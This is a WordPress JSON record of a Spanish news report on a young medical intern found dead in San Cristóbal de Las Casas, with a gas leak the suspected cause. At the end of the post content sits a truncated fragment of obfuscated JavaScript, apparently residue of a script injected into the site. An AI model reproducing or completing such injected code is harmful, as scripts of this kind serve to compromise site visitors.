{"id":18427,"date":"2024-10-19T04:09:23","date_gmt":"2024-10-19T04:09:23","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18427"},"modified":"2024-10-19T04:09:23","modified_gmt":"2024-10-19T04:09:23","slug":"localizan-sin-vida-a-medica-interna-en-san-cristobal-intoxicacion-por-gas-la-posible-causa","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18427","title":{"rendered":"Localizan sin vida a m\u00e9dica interna en San Crist\u00f3bal; intoxicaci\u00f3n por gas, la posible causa"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/WhatsApp-Image-2024-10-18-at-12.48.39-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-18428\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/WhatsApp-Image-2024-10-18-at-12.48.39-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/WhatsApp-Image-2024-10-18-at-12.48.39-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/WhatsApp-Image-2024-10-18-at-12.48.39-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/WhatsApp-Image-2024-10-18-at-12.48.39-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez \/ Corresponsal<\/p>\n\n\n\n<p>18 de octubre del 2024. San Crist\u00f3bal de Las Casas.- La ma\u00f1ana de este viernes fue hallado el cuerpo sin vida de Evelin Carolina D\u00edaz \u00c1lvarez, una joven m\u00e9dica interna de aproximadamente 23 a\u00f1os de edad, quien realizaba su residencia en el Hospital de las Culturas.El tr\u00e1gico hallazgo ocurri\u00f3 en la habitaci\u00f3n que la joven rentaba en el barrio de F\u00e1tima, en esta ciudad.<\/p>\n\n\n\n<p>D\u00edaz \u00c1lvarez fue localizada por sus compa\u00f1eros, quienes notaron su ausencia en el hospital el d\u00eda anterior. Debido a que era conocida por su puntualidad y responsabilidad, su ausencia gener\u00f3 preocupaci\u00f3n. El coordinador de m\u00e9dicos del hospital, Jorge Francisco N., intent\u00f3 comunicarse con ella v\u00eda telef\u00f3nica, sin \u00e9xito. Ante la falta de respuesta, consultaron a su compa\u00f1era de cuarto, quien mencion\u00f3 que no sab\u00eda de ella, ya que hab\u00eda estado de guardia la noche anterior.<\/p>\n\n\n\n<p>Alarmados por la situaci\u00f3n, el coordinador y otros miembros del personal m\u00e9dico acudieron al departamento donde viv\u00eda D\u00edaz \u00c1lvarez. Al llegar al lugar, encontraron a la joven m\u00e9dica sin signos vitales, lo que los llev\u00f3 a dar aviso inmediato a las autoridades.<\/p>\n\n\n\n<p>La Polic\u00eda Municipal fue la primera en llegar al sitio, asegurando el \u00e1rea para las investigaciones correspondientes. Param\u00e9dicos que acudieron al llamado revisaron a la joven y confirmaron su fallecimiento. Durante su evaluaci\u00f3n, se percibi\u00f3 un fuerte olor a gas en el ambiente, lo que sugiere que una posible fuga de gas pudo haber provocado su intoxicaci\u00f3n y posterior muerte.<\/p>\n\n\n\n<p>El Ministerio P\u00fablico acudi\u00f3 al departamento, ubicado en la Calzada de los Ministerios, n\u00famero 14 A, para realizar las diligencias correspondientes. Ordenaron el levantamiento del cuerpo y su traslado al Servicio M\u00e9dico Forense para la autopsia que determinar\u00e1 oficialmente la causa del deceso.<\/p>\n\n\n\n<p>El fallecimiento de Evelin Carolina D\u00edaz \u00c1lvarez ha conmocionado al personal m\u00e9dico del Hospital de las Culturas, quienes la describen como una persona dedicada y comprometida con su labor. Las autoridades contin\u00faan con las investigaciones para esclarecer las circunstancias exactas de su muerte.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez \/ Corresponsal 18 de octubre del 2024. San Crist\u00f3bal de Las Casas.- La ma\u00f1ana de este viernes fue hallado el cuerpo sin vida de Evelin Carolina D\u00edaz \u00c1lvarez, una joven m\u00e9dica interna de aproximadamente 23 a\u00f1os de edad, quien realizaba su residencia en el Hospital de las Culturas.El tr\u00e1gico hallazgo ocurri\u00f3 en la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18428,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-18427","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18427","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18427"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18427\/revisions"}],"predecessor-version":[{"id":18429,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18427\/revisions\/18429"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18428"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18427"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18427"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18427"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}